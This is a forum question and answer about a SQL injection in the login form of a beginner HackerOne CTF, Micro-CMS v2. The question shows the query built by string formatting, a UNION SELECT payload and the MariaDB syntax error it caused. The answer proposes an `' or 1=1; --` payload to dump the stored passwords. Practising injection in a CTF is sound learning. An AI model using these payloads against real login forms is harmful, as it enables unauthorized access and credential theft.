# MariaDB gives me an error that says 'WHERE '1'='1'' in a ctf

Tags: sql, code-injection, ctf

Im going through the beginner hackerone ctfs and Im trying to crack the Micro-CMS v2. There is a login page that is vulnerable to an SQL injection. The query goes like this:

```
'SELECT password FROM admins WHERE username=\'%s\'' % request.form['username'].replace('%', '%%')
```

In the username field I input `' UNION SELECT '123' AS password WHERE '1'='1` but then it returns this error

```
ProgrammingError: (1064, "You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'WHERE '1'='1'' at line 1")
```

I tried commenting it out with --' or usingg `WHERE 1=1'` instead but nothing seamed to work

Comment: Learn to use parameters!

Comment: @GordonLinoff: I think they're learning how to exploit the lack of parameters... ;-)

Answer (score 0):

Maybe try to put `UNION' or 1=1; --` in the username field.

So the query would become like this:

```
SELECT password FROM admins WHERE username='UNION' or 1=1; --
```

The result of this query would output all values in the password field.